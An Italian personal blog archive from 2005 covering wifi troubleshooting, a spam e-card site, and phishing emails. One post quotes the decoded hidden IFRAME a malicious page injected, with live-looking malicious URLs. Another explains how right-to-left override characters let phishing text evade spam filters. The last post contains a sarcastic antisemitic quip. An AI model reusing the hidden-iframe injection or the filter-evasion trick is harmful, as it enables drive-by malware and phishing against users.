Archivi categoria: 2003-05

solite arti magiche

Ieri sera Loris è passato a casa mia per vedere cosa non funzionava nella nostra rete wifi. Dopo due ore con tre PC (win98, xp e fedora), tre schedine wireless (una vecchia Orinoco, una rtl8180 e una Cisco) e due access point (il nostro digicom e quello portato da Loris) abbiamo scoperto che:
– l’access point funziona
– il mio PC funziona, ma non sembrano funzionare né la mia scheda wifi rtl (troppi CRC error in ricezione) né la mia schedina USB 2.0.
– da qualche parte nel mio palazzo ci potrebbe essere un’apparecchiatura sulla frequenza 2.4 GB, che non è una rete wifi e soprattutto spara più o meno ovunque sulle frequenze;
– spostandomi sul canale 1, l’orinoco funziona sul mio PC vicino all’access point, non sembra funzionare su quello di Anna lontano dall’access point. Ma qui mancano ancora ulteriori informazioni.
Il tutto naturalmente senza nessuna certezza, altrimenti non staremmo parlando di informatica.

Ultimo aggiornamento: 2005-11-18 15:31

e-cartolina virale?

Tra lo spam odierno, mi è arrivato il messaggio che affermava che avevo un “Multimedia Postcards(R) Greeting” per me, con tanto di sito dove andare a scaricare (http://www.bazumcircus.it/img/news2/) e codice ( DP_42a04492060aaa46).
Per curiosità ho provato ad andare direttamente sulla homepage del sito… e Mozilla mi si è chiuso. A questo punto ho fatto quello che dovevo fare subito, vale a dire prendere Lynx: la home page mi dà (anzi mi dava, l’hanno già chiuso) una sfilza di link a siti che offrono medicinali sessuali, e terminava con un document.write scritto in esadecimale, che tradotto dà
<IFRAME SRC=”http://crunet.info/out.php?s_id=1″ WIDTH=0 BORDER=0 HEIGHT=0 style=”display:none”></IFRAME>.
crunet.info è un sito russo – o almeno scritto in russo, e quel php mi rimanda a un non meglio identificato http://195.225.177.33/0305.html; il quale però (senza ammettere cookie, ovvio) non dice molto. Zigh, una ricerchina fatta per nulla… però mi pareva più professionale del solito.
AGGIORNAMENTO:Naturalmente io sono stato così stupido da scrivere io il testo “IFRAME”. Solo che non usando internet explorer, naturalmente non mi capitava nulla, così come non è capitato nulla a chi mi legge con safari, mozilla, netscape … (o via RSS). Adesso che zop mi ha fatto notare la cosa ho scoperto la gabola (adesso la scritta non è più lanciabile, tranquilli!)

Ultimo aggiornamento: 2005-11-13 20:46

misteri di proxy

Dall’ufficio mi connetto a Internet con un proxy. Come molti sanno, chi gestisce il proxy può fare tante belle cose, come bloccare – o magari rallentare molto – l’accesso a una serie di siti. In genere, questo capita con il porno; da noi, a quanto sembra, sotto la scure è caduto Mutts (sul porno non saprei dire).

Ultimo aggiornamento: 2005-11-08 10:18

pihshnig

Di phishing ne ho parlato più volte, e ho anche fatto notare come l’italiano del testo (quando c’è) sia in genere piuttosto teorico. Ma per gli sfortunati che non hanno ricevuto questo messaggio – a me è fin arrivato doppio, una copia è stata riconosciuta come spam, l’altra no – non posso esimermi dal mostrarvelo.
Bcnaa Ietnsa/ BancoPtsoa/ San Paool IMI/ Finceo ceihde il vtsoro cotubirtno:
Per i posesssori di un cnoto, a segotiu di virefiche di l’irednizzo di potsa enorttelica nei nirtso daatbase clienti, si e
reos necoirasse uzzilito online la cofnerma dei Soui dait. Le chiedaimo pcreio di confermicra i dait in nsotro possesso,
accedeodn al seugente form proteott:
No, non è il risultato di un dislessico, né un esercizio di stile à la Queneau. Andando a vedere il sorgente del messaggio, si scopre che il testo è in multipart/alternate (cioè, ci sono due pezzi che dovrebbero avere lo stesso contenuto), testo normale o html. Solo che il testo normale è in realtà vuoto, quindi deve per forza essere mostrato quello in HTML, che comincia così:
B‮cna‬a I‮etn‬sa/ BancoP‮tso‬a/ San Pao‮ol‬ IMI/ Fin‮ce‬o c‮eih‬de il v‮tso‬ro co‮tubirtn‬o:
Non spaventatevi. I “caratteri” – se vogliamo fare gli esperti, dovremmo chiamarli “entità”, ma chisseneimporta – ‮ e ‬ significano rispettivamente “da qua si scrive da destra a sinistra” e “da qua non si scrive più da destra a sinistra”. Quindi, se apriamo il messaggio con un programma che capisce bene HTML, la prima parola è “B” , poi “cna” scritto alla rovescia e che quindi diventa “anc”, e infine “a”. Risultato? “Banca”.
In questo modo, però, i sistemi antispam non riescono a riconoscere la parola incriminata, e quindi non scatta l’allarme spam.
Peccato (per lo spammer, intendo) che il sistema sia troppo intelligente, e ad esempio sull’interfaccia di Gmail non funzioni…

Ultimo aggiornamento: 2005-11-06 21:34

Il mio portatile si sfalda

Non sono cose belle da dirsi. Però ha iniziato il mio mouse, che connettevo per mezzo di un adattatore alla porta PS/2 e a un tratto ha smesso di funzionare: se lo metto sulla porta USB funziona perfettamente, e mouse+adattatore vanno bene su un altro PC. Poi a un tratto la schedina wi-fi si è anch’essa bloccata, dando una sfilza di CRC errors e nemmeno un pacchetto ricevuto. Il router funziona, perché la schedina sulla macchina di Anna funziona perfettamente; la scheda non so, perché non ho voglia di installare tutto il software sull’altro pc. La scheda di Anna, che è più vecchia, vede la rete ma non ci si attacca.
Mo’ che faccio? io contavo di sopravviverci ancora un annetto, in fin dei conti il pc è del 2002. Una riparazione comincia a costarmi troppo. Forse un’imposizione delle mani?

Ultimo aggiornamento: 2005-10-13 14:51

un po' di attenzione, insomma!

Capisco volere fare del phishing scritto in un italiano diciamo “interessante” (che ne dite di «se recentemente accedeste al vostro conto mentre viaggiavate»?)
Capisco che non sono molti a guardare le header e vedere che il messaggio è stato spedito da TLV62-0-78-214.bb.netvision.net.il (eh, questi sporchi ebrei… :-) )
Però postare il messaggio usando come mittente ChiquitaBayno@bancopostaonline.poste.it mi pare un po’ troppo!

Ultimo aggiornamento: 2005-10-11 10:27